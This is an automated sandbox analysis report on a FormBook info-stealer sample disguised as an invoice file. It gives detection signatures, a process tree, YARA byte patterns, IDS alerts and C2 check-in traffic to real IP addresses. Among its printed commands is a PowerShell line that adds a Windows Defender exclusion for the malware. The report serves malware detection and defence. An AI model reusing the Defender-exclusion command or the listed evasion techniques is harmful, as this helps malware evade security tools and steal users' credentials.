Windows Analysis Report
Factura (3).exe

Overview

General Information

Sample name:Factura (3).exe
Analysis ID:1442718
MD5:367f6a9b9b00f860281fe3865a0d33f0
SHA1:b82f862d256fd63ceb31982178b35f31670a13d3
SHA256:0b5726f67e41a222543e4bc949db567350231b5dd0c791d72ce2005e0a5af704
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Disables UAC (registry)
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • Factura (3).exe (PID: 7400 cmdline: "C:\Users\user\Desktop\Factura (3).exe" MD5: 367F6A9B9B00F860281FE3865A0D33F0)
    • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7492 cmdline: powershell.exe -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • calc.exe (PID: 7776 cmdline: "C:\Windows\System32\calc.exe" MD5: 5DA8C98136D98DFEC4716EDD79C7145F)
      • csc.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • KAnMKAQhHABqpRuDRpLtww.exe (PID: 1956 cmdline: "C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • chkdsk.exe (PID: 4920 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
            • KAnMKAQhHABqpRuDRpLtww.exe (PID: 1016 cmdline: "C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • WerFault.exe (PID: 7932 cmdline: C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
14.2.csc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.csc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ce53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
14.2.csc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
14.2.csc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: powershell.exe -EncodedCommand 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
            Source: Process started, Author: frack113, Data: Command: powershell.exe -EncodedCommand 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
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell.exe -EncodedCommand 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
            Snort IDS alerts

            Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
            05/16/24-17:19:27.047625  2855465  49722        80                TCP       A Network Trojan was detected
            05/16/24-17:21:43.322537  2855464  49747        80                TCP       A Network Trojan was detected
            05/16/24-17:19:56.497938  2855465  49730        80                TCP       A Network Trojan was detected
            05/16/24-17:20:28.696791  2855464  49736        80                TCP       A Network Trojan was detected
            05/16/24-17:21:12.951995  2855465  49742        80                TCP       A Network Trojan was detected
            05/16/24-17:19:19.363164  2855464  49719        80                TCP       A Network Trojan was detected
            05/16/24-17:21:22.633918  2855464  49744        80                TCP       A Network Trojan was detected
            05/16/24-17:18:46.331711  2855465  49713        80                TCP       A Network Trojan was detected
            05/16/24-17:19:21.898890  2855464  49720        80                TCP       A Network Trojan was detected
            05/16/24-17:20:03.048420  2855464  49731        80                TCP       A Network Trojan was detected
            05/16/24-17:19:51.432033  2855464  49728        80                TCP       A Network Trojan was detected
            05/16/24-17:19:06.306804  2855464  49716        80                TCP       A Network Trojan was detected
            05/16/24-17:21:04.300154  2855464  49739        80                TCP       A Network Trojan was detected
            05/16/24-17:20:10.669912  2855465  49734        80                TCP       A Network Trojan was detected
            05/16/24-17:21:51.276734  2855465  49750        80                TCP       A Network Trojan was detected
            05/16/24-17:20:26.161324  2855464  49735        80                TCP       A Network Trojan was detected
            05/16/24-17:21:06.836740  2855464  49740        80                TCP       A Network Trojan was detected
            05/16/24-17:19:34.590843  2855464  49723        80                TCP       A Network Trojan was detected
            05/16/24-17:21:27.714376  2855465  49746        80                TCP       A Network Trojan was detected
            05/16/24-17:20:33.776360  2855465  49738        80                TCP       A Network Trojan was detected
            05/16/24-17:19:03.768347  2856318  49714        80                TCP       A Network Trojan was detected
            05/16/24-17:19:42.203635  2855465  49726        80                TCP       A Network Trojan was detected
            05/16/24-17:21:20.106505  2855464  49743        80                TCP       A Network Trojan was detected
            05/16/24-17:19:03.768347  2855464  49714        80                TCP       A Network Trojan was detected
            05/16/24-17:20:05.587966  2855464  49732        80                TCP       A Network Trojan was detected
            05/16/24-17:21:45.851510  2855464  49748        80                TCP       A Network Trojan was detected
            05/16/24-17:19:11.367879  2855465  49718        80                TCP       A Network Trojan was detected
            05/16/24-17:19:37.117289  2855464  49724        80                TCP       A Network Trojan was detected
            05/16/24-17:19:48.469305  2855464  49727        80                TCP       A Network Trojan was detected


            AV Detection

            Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
            Source: Factura (3).exe, ReversingLabs: Detection: 34%
            Source: Yara match, File source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Exploits

            Source: Yara match, File source: 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR
            Source: Factura (3).exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Configuration.Install.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdbp source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdbN source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb" source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Numerics.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdbGCTL source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C10000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb" source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: chkdsk.pdb source: csc.exe, 0000000E.00000002.1567571580.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3764224956.0000000001558000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: e.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 0000000E.00000003.1424584842.0000000005012000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000E.00000002.1567920536.000000000550E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1567081999.000000000505D000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1569342109.0000000005202000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdbpdb< source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Data.pdbH source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: mscorlib.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Numerics.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: omation.pdbVX source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbp^ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb! source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: XC:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbPE source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb` source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.PowerShell.Commands.Management.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.pdbh source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbD;. source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29C57000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb0 source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KAnMKAQhHABqpRuDRpLtww.exe, 00000014.00000002.3762440528.000000000097E000.00000002.00000001.01000000.00000009.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000000.1640062378.000000000097E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Configuration.Install.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0OJ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdbmation.pdbpdbion.pdbment.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1563023145.0000000B0F501000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.VisualBasic.pdb8 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1604691590.000001CE29CE3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb@ source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Data.ni.pdbRSDSC source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Xml.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbrogram x source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29F9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Management.Automation.pdb3 source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.pdbiy source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Transactions.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.ni.pdb source: WERFCB2.tmp.dmp.17.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERFCB2.tmp.dmp.17.dr
            Source: C:\Users\user\Desktop\Factura (3).exe Code function: 6_2_00007FF7340FFC58 FindFirstFileExW, 6_2_00007FF7340FFC58
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 23_2_0076B5C0 FindFirstFileW,FindNextFileW,FindClose, 23_2_0076B5C0
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then xor eax, eax 23_2_00759320
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 23_2_0075D8A9
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 23_2_00761B46

            Networking

            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49713 -> 3.33.130.190:80
            Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.9:49714 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49714 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 57.151.38.169:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 57.151.38.169:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 57.151.38.169:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 162.241.216.140:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 217.160.0.111:80
            Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 217.160.0.111:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 217.160.0.111:80
